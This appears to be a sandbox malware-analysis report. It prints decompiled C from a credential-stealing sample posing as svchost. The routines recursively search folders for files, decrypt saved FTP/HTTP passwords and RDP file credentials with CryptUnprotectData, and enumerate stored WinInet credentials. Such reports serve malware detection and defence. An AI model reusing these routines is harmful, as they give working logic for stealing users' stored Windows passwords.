                                                                                                                                        0x100091b8
                                                                                                                                        0x100091be
                                                                                                                                        0x100091c8
                                                                                                                                        0x100091ca
                                                                                                                                        0x100091cc
                                                                                                                                        0x100091cf
                                                                                                                                        0x100091d5
                                                                                                                                        0x100091da
                                                                                                                                        0x100091de
                                                                                                                                        0x100091e4
                                                                                                                                        0x100091e8
                                                                                                                                        0x100091ee
                                                                                                                                        0x100091f2
                                                                                                                                        0x10009200
                                                                                                                                        0x1000920c
                                                                                                                                        0x10009229
                                                                                                                                        0x10009229
                                                                                                                                        0x1000922b
                                                                                                                                        0x10009240
                                                                                                                                        0x10009240
                                                                                                                                        0x10009245
                                                                                                                                        0x10009245
                                                                                                                                        0x10009247
                                                                                                                                        0x1000925c
                                                                                                                                        0x1000925c
                                                                                                                                        0x10009261
                                                                                                                                        0x10009263
                                                                                                                                        0x1000926b
                                                                                                                                        0x10009279
                                                                                                                                        0x10009287
                                                                                                                                        0x10009295
                                                                                                                                        0x100092a3
                                                                                                                                        0x100092a3
                                                                                                                                        0x00000000
                                                                                                                                        0x100092ab
                                                                                                                                        0x100091f2
                                                                                                                                        0x100091e8
                                                                                                                                        0x100091de
                                                                                                                                        0x100091b8
                                                                                                                                        0x100091ac
                                                                                                                                        0x100091a2
                                                                                                                                        0x10009121
                                                                                                                                        0x10009115
                                                                                                                                        0x100092b3
                                                                                                                                        0x100092b3

                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 1000919A
                                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 100091D5
                                                                                                                                        • lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 10009216
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009224
                                                                                                                                        • lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009232
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 10009240
                                                                                                                                        • lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 1000924E
                                                                                                                                        • StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 1000925C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotect
                                                                                                                                        • String ID: ftp://$http://$https://
                                                                                                                                        • API String ID: 3968356742-2804853444
                                                                                                                                        • Opcode ID: 9db12690bd936ee5170574fd5d0f744996d9c3819de52a5819970623f0c1ff3e
                                                                                                                                        • Instruction ID: a8f04a90c6485cdf296070f0934c36fbafb71a4b9764bcec3bcd247837d1814c
                                                                                                                                        • Opcode Fuzzy Hash: 9db12690bd936ee5170574fd5d0f744996d9c3819de52a5819970623f0c1ff3e
                                                                                                                                        • Instruction Fuzzy Hash: 6951B676900509FAEF02DF90DC41EEE7BBAEF08391F108121F615B5069D771AAA4EB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000673C, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E1000673C(void* __ebx, void* __ecx, intOrPtr _a4, char* _a8, char* _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t36;
				signed int _t38;
				CHAR* _t40;
				void* _t44;
				char* _t47;
				int _t50;
				int _t52;
				int _t55;
				signed int _t57;
				void* _t59;
				void* _t68;
				void* _t69;
				signed int* _t70;

				_t69 = __ecx;
				_t68 = __ebx;
				_v332 = 0;
				_t36 = _a8;
				if(_t36 == 0 ||  *_t36 == 0) {
					L20:
					return E10001871(_v332);
				} else {
					_t38 = E10002582(_a8);
					__eflags = _t38;
					if(_t38 != 0) {
						_t40 = E10001DB1(_a8, "*.*");
					} else {
						_t40 = E10001DB1(_a8, "\*.*");
					}
					_v332 = _t40;
					E1000189F( &_v324, 0x13e);
					_t44 = FindFirstFileA(_v332,  &_v324);
					_v328 = _t44;
					__eflags = _t44 + 1;
					if(_t44 + 1 != 0) {
						do {
							_t70 =  &_v324;
							__eflags =  *_t70 & 0x00000010;
							if(( *_t70 & 0x00000010) == 0) {
								_v336 =  &(_t70[0xb]);
								_t47 = StrStrIA(_v336, _a12);
								__eflags = _t47;
								if(_t47 != 0) {
									E100066F7(_t68, _t69, _t70, __eflags, _a4, E10001E05(E10001DB1(_a8, "\\"), _v336));
									E10001871(_t65);
								}
							} else {
								_t52 = lstrcmpiA(0x1000f8fd,  &(_t70[0xb]));
								__eflags = _t52;
								if(_t52 != 0) {
									_t55 = lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName));
									__eflags = _t55;
									if(_t55 != 0) {
										_t57 = E10002582(_a8);
										__eflags = _t57;
										if(_t57 != 0) {
											_t59 = E10001DB1(_a8, 0);
										} else {
											_t59 = E10001DB1(_a8, "\\");
										}
										E1000673C(_t68, _t69, _a4, E10001E05(_t59,  &( &_v324->cFileName)), _a12);
										E10001871(_t60);
									}
								}
							}
							_t50 = FindNextFileA(_v328,  &_v324);
							__eflags = _t50;
						} while (_t50 != 0);
						FindClose(_v328);
					}
					goto L20;
				}
			}




















                                                                                                                                        0x1000673c
                                                                                                                                        0x1000673c
                                                                                                                                        0x10006745
                                                                                                                                        0x10006752
                                                                                                                                        0x10006754
                                                                                                                                        0x100068b1
                                                                                                                                        0x100068bd
                                                                                                                                        0x10006760
                                                                                                                                        0x10006763
                                                                                                                                        0x10006768
                                                                                                                                        0x1000676a
                                                                                                                                        0x10006783
                                                                                                                                        0x1000676c
                                                                                                                                        0x10006774
                                                                                                                                        0x10006774
                                                                                                                                        0x10006788
                                                                                                                                        0x1000679a
                                                                                                                                        0x100067ac
                                                                                                                                        0x100067b1
                                                                                                                                        0x100067b7
                                                                                                                                        0x100067b8
                                                                                                                                        0x100067be
                                                                                                                                        0x100067be
                                                                                                                                        0x100067c4
                                                                                                                                        0x100067ca
                                                                                                                                        0x1000684c
                                                                                                                                        0x1000685b
                                                                                                                                        0x10006860
                                                                                                                                        0x10006862
                                                                                                                                        0x10006882
                                                                                                                                        0x10006887
                                                                                                                                        0x10006887
                                                                                                                                        0x100067cc
                                                                                                                                        0x100067d5
                                                                                                                                        0x100067da
                                                                                                                                        0x100067dc
                                                                                                                                        0x100067f2
                                                                                                                                        0x100067f7
                                                                                                                                        0x100067f9
                                                                                                                                        0x10006803
                                                                                                                                        0x10006808
                                                                                                                                        0x1000680a
                                                                                                                                        0x10006820
                                                                                                                                        0x1000680c
                                                                                                                                        0x10006814
                                                                                                                                        0x10006814
                                                                                                                                        0x1000683d
                                                                                                                                        0x10006842
                                                                                                                                        0x10006842
                                                                                                                                        0x100067f9
                                                                                                                                        0x100067dc
                                                                                                                                        0x10006899
                                                                                                                                        0x1000689e
                                                                                                                                        0x1000689e
                                                                                                                                        0x100068ac
                                                                                                                                        0x100068ac
                                                                                                                                        0x00000000
                                                                                                                                        0x100067b8

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 100067AC
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 100067D5
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 100067F2
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 10006899
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 100068AC
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$\*.*
                                                                                                                                        • API String ID: 3040542784-1692270452
                                                                                                                                        • Opcode ID: 9170db4388df77e2495e4da8e8266ef47b2c407c22afde52e3aa8c4dcb22d9fd
                                                                                                                                        • Instruction ID: 2b7cc74e8ea56bf38fa23f324190ba7fb338ac5da67e571f415430ffc7027be8
                                                                                                                                        • Opcode Fuzzy Hash: 9170db4388df77e2495e4da8e8266ef47b2c407c22afde52e3aa8c4dcb22d9fd
                                                                                                                                        • Instruction Fuzzy Hash: 8D311E75404109AEFF11DF60DC42BED7766EF083C4F2482A5FA18A5029EF71AE909B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 7.75%

                                                                                                                                        Function 10009DB0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E10009DB0(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				signed char _v24;
				CHAR* _v28;
				signed char _v32;
				void* _v36;
				char _v40;
				void* _v44;
				char _v48;
				signed char _t40;
				signed char _t43;
				signed char _t51;
				signed char _t53;
				signed char _t55;
				signed char _t59;
				signed char _t64;
				signed char _t65;
				char _t66;

				if( *0x1000f4f4 != 0) {
					_t40 = E10001FB7(__eflags, _a8,  &_v20);
					__eflags = _t40;
					if(_t40 != 0) {
						__eflags = _v8 - 0x100000;
						if(_v8 >= 0x100000) {
							L23:
							return E1000204C( &_v20);
						}
						_t43 = E10002363(_v12, _v8);
						__eflags = _t43;
						if(_t43 != 0) {
							goto L23;
						}
						_v24 = E10009CDE("username:s:", _v12, _v8);
						_v28 = E10009CDE("password 51:b:", _v12, _v8);
						_v32 = E10009CDE("full address:s:", _v12, _v8);
						__eflags = _v24;
						if(_v24 == 0) {
							L22:
							E10001871(_v24);
							E10001871(_v28);
							E10001871(_v32);
							goto L23;
						}
						__eflags = _v28;
						if(_v28 == 0) {
							goto L22;
						}
						__eflags = _v32;
						if(_v32 != 0) {
							_t51 = lstrlenA(_v28);
							_t64 = _t51 >> 1;
							_push(_t64);
							while(1) {
								_t65 = _t64;
								__eflags = _t65;
								if(_t65 == 0) {
									break;
								}
								asm("lodsw");
								__eflags = _t51 - 0x30;
								if(_t51 < 0x30) {
									L12:
									_t53 = _t51 - 0x41 + 0xa;
									__eflags = _t53;
									L13:
									__eflags = _t53 - 0x30;
									if(_t53 < 0x30) {
										L16:
										_t55 = _t53 - 0x41 + 0xa;
										__eflags = _t55;
										L17:
										_t51 = _t55 << 0x00000004 | _t55 << 0x00000004;
										asm("stosb");
										_t64 = _t65 - 1;
										__eflags = _t64;
										continue;
									}
									__eflags = _t53 - 0x39;
									if(_t53 > 0x39) {
										goto L16;
									}
									_t55 = _t53 - 0x30;
									goto L17;
								}
								__eflags = _t51 - 0x39;
								if(_t51 > 0x39) {
									goto L12;
								}
								_t53 = _t51 - 0x30;
								goto L13;
							}
							_pop(_t66);
							_v40 = _t66;
							_push(_v28);
							_pop( *_t22);
							_v44 = 0;
							_t59 =  *0x1000f4f4( &_v40, 0, 0, 0, 0, 1,  &_v48);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags = _v44;
								if(__eflags != 0) {
									E10009B9C(__eflags, _a4, _v24, _v32, _v44, _v48);
									LocalFree(_v44);
								}
							}
						}
						goto L22;
					}
					return _t40;
				} else {
					return __eax;
				}
			}






















                                                                                                                                        0x10009dbf
                                                                                                                                        0x10009dd3
                                                                                                                                        0x10009dd3
                                                                                                                                        0x10009dd5
                                                                                                                                        0x10009ddb
                                                                                                                                        0x10009de2
                                                                                                                                        0x10009eff
                                                                                                                                        0x00000000
                                                                                                                                        0x10009f03
                                                                                                                                        0x10009dee
                                                                                                                                        0x10009df3
                                                                                                                                        0x10009df5
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e0b
                                                                                                                                        0x10009e1e
                                                                                                                                        0x10009e31
                                                                                                                                        0x10009e34
                                                                                                                                        0x10009e38
                                                                                                                                        0x10009ee7
                                                                                                                                        0x10009eea
                                                                                                                                        0x10009ef2
                                                                                                                                        0x10009efa
                                                                                                                                        0x00000000
                                                                                                                                        0x10009efa
                                                                                                                                        0x10009e3e
                                                                                                                                        0x10009e42
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e48
                                                                                                                                        0x10009e4c
                                                                                                                                        0x10009e55
                                                                                                                                        0x10009e61
                                                                                                                                        0x10009e63
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e94
                                                                                                                                        0x10009e96
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e66
                                                                                                                                        0x10009e68
                                                                                                                                        0x10009e6a
                                                                                                                                        0x10009e74
                                                                                                                                        0x10009e76
                                                                                                                                        0x10009e76
                                                                                                                                        0x10009e78
                                                                                                                                        0x10009e78
                                                                                                                                        0x10009e7b
                                                                                                                                        0x10009e87
                                                                                                                                        0x10009e8a
                                                                                                                                        0x10009e8a
                                                                                                                                        0x10009e8d
                                                                                                                                        0x10009e90
                                                                                                                                        0x10009e92
                                                                                                                                        0x10009e93
                                                                                                                                        0x10009e93
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e93
                                                                                                                                        0x10009e7d
                                                                                                                                        0x10009e80
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e82
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e82
                                                                                                                                        0x10009e6c
                                                                                                                                        0x10009e6e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e70
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e70
                                                                                                                                        0x10009e98
                                                                                                                                        0x10009e99
                                                                                                                                        0x10009e9c
                                                                                                                                        0x10009e9f
                                                                                                                                        0x10009ea2
                                                                                                                                        0x10009ebb
                                                                                                                                        0x10009ec1
                                                                                                                                        0x10009ec3
                                                                                                                                        0x10009ec5
                                                                                                                                        0x10009ec9
                                                                                                                                        0x10009eda
                                                                                                                                        0x10009ee2
                                                                                                                                        0x10009ee2
                                                                                                                                        0x10009ec9
                                                                                                                                        0x10009ec3
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e4c
                                                                                                                                        0x10009f0b
                                                                                                                                        0x10009dc4
                                                                                                                                        0x10009dc4
                                                                                                                                        0x10009dc4

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 10009E55
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 10009EBB
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 10009EE2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                                                                                        • API String ID: 2920030623-2945746679
                                                                                                                                        • Opcode ID: 53c5e35d188f79bff04283a5370ca8336e1b183e5a0bf9ca9dbd06af5e2ed465
                                                                                                                                        • Instruction ID: e9946a190e3f1b886fcfc70145eac174cada5b371718b51a596e5b63238612e6
                                                                                                                                        • Opcode Fuzzy Hash: 53c5e35d188f79bff04283a5370ca8336e1b183e5a0bf9ca9dbd06af5e2ed465
                                                                                                                                        • Instruction Fuzzy Hash: D4413976D0014AAAFF11DBE0CC46BEEBBB5EB443D0F100026F641B50A9DB755E92DB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        Function 100080E0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 10008152
                                                                                                                                        • lstrlenW.KERNEL32(10010429,?,?,00000000), ref: 10008190
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 100081C0
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 100081F2
                                                                                                                                        • CredFree.ADVAPI32(00000000), ref: 10008210
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                                                                                                        • String ID: Microsoft_WinInet_*
                                                                                                                                        • API String ID: 3891647360-439986189
                                                                                                                                        • Opcode ID: 51c270d82e88255994f1764cbe3a61f2b5843da7e40cc33b2207a9cd69d01b0a
                                                                                                                                        • Instruction ID: df921cf5f0bab22aaa9602da5f097936af93cbe1de05f5093905011ad881e64c
                                                                                                                                        • Opcode Fuzzy Hash: 51c270d82e88255994f1764cbe3a61f2b5843da7e40cc33b2207a9cd69d01b0a
                                                                                                                                        • Instruction Fuzzy Hash: 3D314E72900119EBFF11CF80CC45BEEB7F8FB14380F104029E681B61A9D7B89A85DBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 3.75%

                                                                                                                                        Function 02442FC8, Relevance: 4.5, APIs: 3, Instructions: 25encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442FC8() {
				intOrPtr _t11;
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				_t11 =  *((intOrPtr*)(_t17 - 0x10));
				return _t11;
			}





                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x02443037
                                                                                                                                        0x02443041

                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: aaa09cd50603d49b610475c4f132bddee2d4a5502ed520d206129c5e0a6e190e
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: aaa09cd50603d49b610475c4f132bddee2d4a5502ed520d206129c5e0a6e190e
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        Function 02442F60, Relevance: 4.5, APIs: 3, Instructions: 25encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442F60() {
				intOrPtr _t11;
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				_t11 =  *((intOrPtr*)(_t17 - 0x10));
				return _t11;
			}





                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x02443037
                                                                                                                                        0x02443041

                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: 652cd781ef76f60e84d3d7b0831cd49a09c83339d69904f1084787659a1b8662
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: 652cd781ef76f60e84d3d7b0831cd49a09c83339d69904f1084787659a1b8662
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        Function 02442FE8, Relevance: 4.5, APIs: 3, Instructions: 25encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442FE8() {
				intOrPtr _t11;
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				_t11 =  *((intOrPtr*)(_t17 - 0x10));
				return _t11;
			}





                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x02443037
                                                                                                                                        0x02443041

                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: b16c4224f519aef1f2968b31a2511ed3a3f190798967613916683fa9a57965a6
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: b16c4224f519aef1f2968b31a2511ed3a3f190798967613916683fa9a57965a6
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        Function 02442F9E, Relevance: 4.5, APIs: 3, Instructions: 25encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442F9E() {
				intOrPtr _t11;
				void* _t17;

				if( *(_t17 - 4) != 0) {
					__imp__CryptDestroyHash( *(_t17 - 4));
					 *(_t17 - 4) = 0;
				}
				if( *(_t17 - 0xc) != 0) {
					CryptDestroyKey( *(_t17 - 0xc));
					 *(_t17 - 0xc) = 0;
				}
				if( *(_t17 - 8) != 0) {
					CryptReleaseContext( *(_t17 - 8), 0);
					 *(_t17 - 8) = 0;
				}
				_t11 =  *((intOrPtr*)(_t17 - 0x10));
				return _t11;
			}





                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x02443037
                                                                                                                                        0x02443041

                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: b230cb32c14183c851f01f381da461bc28c56bd83e9851dcbd3629af220de3ad
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: b230cb32c14183c851f01f381da461bc28c56bd83e9851dcbd3629af220de3ad
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        Function 100043D4, Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 10004420
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 10004454
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1561624719-0
